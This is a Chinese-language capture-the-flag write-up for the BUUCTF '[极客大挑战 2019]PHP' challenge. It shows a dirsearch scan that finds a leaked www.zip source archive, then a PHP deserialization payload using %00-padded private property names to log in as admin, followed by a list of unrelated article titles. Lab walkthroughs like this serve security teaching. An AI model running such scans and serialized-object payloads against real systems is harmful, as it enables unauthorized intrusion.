当前位置: 首页 > news >正文

[极客大挑战 2019]PHP1

news 来源:原创 2024/9/20 16:36:34

打开题目

游戏界面

猜测php里面有文件,我们可以用dirsearch 扫描一下这个服务器

执行命令

dirsearch -u http://2999dfd5-1d43-4a81-a088-9e41c9dccab4.node4.buuoj.cn/ -e php > test.log

最后在log文件中找到一个 200 www.zip

浏览器输入payload下载下来

得到目录文件

解读一下php代码,进行反序列化

payload

?select=O:4:“Name”:3:{s:14:" Name username";s:5:“admin”;s:14:" Name password";i:100;}

但是发现这个里面有空格,所以把空格url编码变成%00再传参

Payload:

/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • APP逆向 day25unidbg中
  • 遗传算法与深度学习实战——生命模拟及其应用
  • 嵌入式C++、ROS 、OpenCV、SLAM 算法和路径规划算法:自主导航的移动机器人流程设计(代码示例)
  • .JPG图片,各种压缩率下的文件尺寸
  • 这两个大龄程序员,打算搞垮一个世界软件巨头!
  • Sqlmap中文使用手册 - Enumeration模块参数使用
  • 【前端面试】九、框架
  • 青岛实训DAY18
  • 什么是 5G?
  • JVM—对象已死?
  • 模拟算法概览
  • 【Python】如何编写一个Scrapy扩展(Scrapy Extension)
  • 如何从PyTorch迁移到MindSpore
  • 求值(河南萌新2024)
  • (面试必看!)锁策略
  • [译]Python中的类属性与实例属性的区别
  • 【162天】黑马程序员27天视频学习笔记【Day02-上】
  • Angular6错误 Service: No provider for Renderer2
  • CSS3 变换
  • C学习-枚举(九)
  • docker python 配置
  • Effective Java 笔记(一)
  • ERLANG 网工修炼笔记 ---- UDP
  • ES6 ...操作符
  • GDB 调试 Mysql 实战(三)优先队列排序算法中的行记录长度统计是怎么来的(上)...
  • Javascript 原型链
  • Linux快速复制或删除大量小文件
  • mysql 5.6 原生Online DDL解析
  • python 装饰器(一)
  • Vue小说阅读器(仿追书神器)
  • weex踩坑之旅第一弹 ~ 搭建具有入口文件的weex脚手架
  • 初识 webpack
  • 从setTimeout-setInterval看JS线程
  • 京东美团研发面经
  • 马上搞懂 GeoJSON
  • 买一台 iPhone X,还是创建一家未来的独角兽?
  • 前端存储 - localStorage
  • 前端性能优化--懒加载和预加载
  • 如何使用Mybatis第三方插件--PageHelper实现分页操作
  • 实习面试笔记
  • 使用Envoy 作Sidecar Proxy的微服务模式-4.Prometheus的指标收集
  • 项目管理碎碎念系列之一:干系人管理
  • 赢得Docker挑战最佳实践
  • 分布式关系型数据库服务 DRDS 支持显示的 Prepare 及逻辑库锁功能等多项能力 ...
  • ​ArcGIS Pro 如何批量删除字段
  • ​插件化DPI在商用WIFI中的价值
  • # Swust 12th acm 邀请赛# [ K ] 三角形判定 [题解]
  • # 详解 JS 中的事件循环、宏/微任务、Primise对象、定时器函数,以及其在工作中的应用和注意事项
  • # 执行时间 统计mysql_一文说尽 MySQL 优化原理
  • #QT(串口助手-界面)
  • (39)STM32——FLASH闪存
  • (4)Elastix图像配准:3D图像
  • (vue)el-tabs选中最后一项后更新数据后无法展开
  • (八)Flask之app.route装饰器函数的参数
  • (转)Windows2003安全设置/维护